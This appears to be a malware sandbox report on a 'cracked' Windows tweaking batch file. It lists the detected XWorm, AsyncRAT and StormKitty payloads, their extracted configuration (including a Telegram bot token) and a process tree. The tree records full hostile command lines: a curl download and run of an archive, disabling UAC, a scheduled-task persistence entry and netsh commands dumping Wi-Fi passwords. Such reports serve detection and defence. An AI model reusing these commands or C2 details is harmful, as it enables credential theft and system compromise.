Analysis

  • max time kernel
    264s
  • max time network
    265s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-de
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-delocale:de-deos:windows10-2004-x64systemwindows
  • submitted
    29-11-2024 22:55

General

  • Target

    https://www.upload.ee/files/16537227/EXM_Premium_Tweaking_Utility_1.0_Cracked.bat.html

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/ZnhxAV6a

  • telegram

    https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 16 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies registry class 12 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.upload.ee/files/16537227/EXM_Premium_Tweaking_Utility_1.0_Cracked.bat.html
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3644
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc782b46f8,0x7ffc782b4708,0x7ffc782b4718
      2⤵
        PID:4764
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
        2⤵
          PID:4640
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3596
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
          2⤵
            PID:2680
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
            2⤵
              PID:1300
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
              2⤵
                PID:4452
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --service-sandbox-type=collections --mojo-platform-channel-handle=5092 /prefetch:8
                2⤵
                  PID:3112
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
                  2⤵
                    PID:2420
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
                    2⤵
                      PID:1592
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2964
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4404
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
                      2⤵
                        PID:4928
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
                        2⤵
                          PID:3000
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                          2⤵
                            PID:4128
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --lang=de --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
                            2⤵
                              PID:4472
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2008,18306510242722056120,12148795964079845581,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5056 /prefetch:2
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1564
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:3192
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:5056
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:1420
                                • C:\Windows\System32\NOTEPAD.EXE
                                  "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat
                                  1⤵
                                  • Opens file in notepad (likely ransom note)
                                  PID:3192
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat" "
                                  1⤵
                                    PID:3268
                                    • C:\Windows\system32\reg.exe
                                      Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
                                      2⤵
                                        PID:556
                                      • C:\Windows\system32\reg.exe
                                        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
                                        2⤵
                                          PID:3584
                                        • C:\Windows\system32\reg.exe
                                          Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
                                          2⤵
                                            PID:1724
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
                                            2⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1220
                                          • C:\Windows\system32\reg.exe
                                            Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
                                            2⤵
                                            • UAC bypass
                                            PID:3100
                                          • C:\Windows\system32\reg.exe
                                            Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
                                            2⤵
                                              PID:1404
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
                                              2⤵
                                                PID:1000
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic path Win32_UserAccount where name="Admin" get sid
                                                  3⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2488
                                                • C:\Windows\system32\findstr.exe
                                                  findstr "S-"
                                                  3⤵
                                                    PID:3412
                                                • C:\Windows\system32\chcp.com
                                                  chcp 65001
                                                  2⤵
                                                    PID:2452
                                                  • C:\Windows\system32\chcp.com
                                                    chcp 437
                                                    2⤵
                                                      PID:4040
                                                    • C:\Windows\system32\curl.exe
                                                      curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
                                                      2⤵
                                                        PID:2440
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
                                                        2⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2452
                                                      • C:\exm\EXMservice.exe
                                                        EXMservice.exe
                                                        2⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        PID:3436
                                                        • C:\Users\Admin\msedge.exe
                                                          "C:\Users\Admin\msedge.exe"
                                                          3⤵
                                                          • Checks computer location settings
                                                          • Drops startup file
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: AddClipboardFormatListener
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2936
                                                          • C:\Windows\System32\schtasks.exe
                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
                                                            4⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:1080
                                                        • C:\Users\Admin\svchost.exe
                                                          "C:\Users\Admin\svchost.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Drops desktop.ini file(s)
                                                          • System Location Discovery: System Language Discovery
                                                          • Checks processor information in registry
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3544
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                            PID:2684
                                                            • C:\Windows\SysWOW64\chcp.com
                                                              chcp 65001
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2172
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh wlan show profile
                                                              5⤵
                                                              • Event Triggered Execution: Netsh Helper DLL
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                              PID:4624
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr All
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:456
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001." key=clear | findstr Key
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                            PID:2800
                                                            • C:\Windows\SysWOW64\chcp.com
                                                              chcp 65001
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3068
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh wlan show profile name="65001." key=clear
                                                              5⤵
                                                              • Event Triggered Execution: Netsh Helper DLL
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                              PID:1000
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr Key
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3664
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2836
                                                            • C:\Windows\SysWOW64\chcp.com
                                                              chcp 65001
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4912
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh wlan show networks mode=bssid
                                                              5⤵
                                                              • Event Triggered Execution: Netsh Helper DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:536
                                                      • C:\Windows\system32\chcp.com
                                                        chcp 65001
                                                        2⤵
                                                          PID:2756
                                                        • C:\Windows\system32\reg.exe
                                                          Reg.exe add "HKLM\SOFTWARE\Microsoft\FTH" /v "Enabled" /t REG_DWORD /d "0" /f
                                                          2⤵
                                                            PID:768
                                                          • C:\Windows\system32\reg.exe
                                                            Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineCore" /f
                                                            2⤵
                                                              PID:548
                                                            • C:\Windows\system32\reg.exe
                                                              Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineUA" /f
                                                              2⤵
                                                                PID:3452
                                                              • C:\Windows\system32\reg.exe
                                                                Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "StartupBoostEnabled" /t REG_DWORD /d "0" /f
                                                                2⤵
                                                                  PID:1076
                                                                • C:\Windows\system32\reg.exe
                                                                  Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "BackgroundModeEnabled" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:2772
                                                                  • C:\Windows\system32\reg.exe
                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "UseDpiScaling" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:4212
                                                                    • C:\Windows\system32\reg.exe
                                                                      Reg.exe add "HKCU\Software\Microsoft\Multimedia\Audio" /v "UserDuckingPreference" /t REG_DWORD /d "3" /f
                                                                      2⤵
                                                                        PID:5076
                                                                      • C:\Windows\system32\reg.exe
                                                                        Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\BootAnimation" /v "DisableStartupSound" /t REG_DWORD /d "1" /f
                                                                        2⤵
                                                                          PID:416
                                                                        • C:\Windows\system32\reg.exe
                                                                          Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
                                                                          2⤵
                                                                            PID:668
                                                                          • C:\Windows\system32\reg.exe
                                                                            Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
                                                                            2⤵
                                                                              PID:468
                                                                            • C:\Windows\system32\reg.exe
                                                                              Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
                                                                              2⤵
                                                                                PID:1296
                                                                              • C:\Windows\system32\reg.exe
                                                                                Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ctfmon" /t REG_SZ /d "C:\Windows\System32\ctfmon.exe" /f
                                                                                2⤵
                                                                                • Adds Run key to start application
                                                                                PID:4648
                                                                              • C:\Windows\system32\reg.exe
                                                                                Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\VideoSettings" /v "VideoQualityOnBattery" /t REG_DWORD /d "1" /f
                                                                                2⤵
                                                                                  PID:4240
                                                                                • C:\Windows\system32\reg.exe
                                                                                  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "IconsOnly" /t REG_DWORD /d "0" /f
                                                                                  2⤵
                                                                                    PID:1864
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "0" /f
                                                                                    2⤵
                                                                                      PID:2208
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                                      2⤵
                                                                                        PID:3340
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                                        2⤵
                                                                                          PID:2544
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowDeviceNameInTelemetry" /t REG_DWORD /d "0" /f
                                                                                          2⤵
                                                                                            PID:4868
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\safer\codeidentifiers" /v "authenticodeenabled" /t REG_DWORD /d "0" /f
                                                                                            2⤵
                                                                                              PID:5080
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f
                                                                                              2⤵
                                                                                                PID:2800
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                Reg.exe add "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                                                2⤵
                                                                                                  PID:372
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  Reg.exe add "HKCU\SOFTWARE\Microsoft\Speech_OneCore\Settings\OnlineSpeechPrivacy" /v "HasAccepted" /t REG_DWORD /d "0" /f
                                                                                                  2⤵
                                                                                                    PID:3200
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    Reg.exe add "HKCU\SOFTWARE\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
                                                                                                    2⤵
                                                                                                      PID:1312
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
                                                                                                      2⤵
                                                                                                        PID:4928
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
                                                                                                        2⤵
                                                                                                          PID:5108
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
                                                                                                          2⤵
                                                                                                            PID:1620
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
                                                                                                            2⤵
                                                                                                              PID:3880
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              Reg.exe add "HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings" /v "DownloadMode" /t REG_DWORD /d "0" /f
                                                                                                              2⤵
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:3512
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f
                                                                                                              2⤵
                                                                                                                PID:1572
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f
                                                                                                                2⤵
                                                                                                                  PID:3000
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f
                                                                                                                  2⤵
                                                                                                                    PID:744
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f
                                                                                                                    2⤵
                                                                                                                      PID:1436
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
                                                                                                                      2⤵
                                                                                                                        PID:3112
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                                        2⤵
                                                                                                                          PID:4080
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\appDiagnostics" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                                          2⤵
                                                                                                                            PID:3444
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\userAccountInformation" /v "Value" /t REG_SZ /d "Deny" /f
                                                                                                                            2⤵
                                                                                                                              PID:228
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f
                                                                                                                              2⤵
                                                                                                                                PID:4700
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SystemPaneSuggestionsEnabled" /t REG_DWORD /d "0" /f
                                                                                                                                2⤵
                                                                                                                                  PID:444
                                                                                                                                • C:\Windows\system32\reg.exe
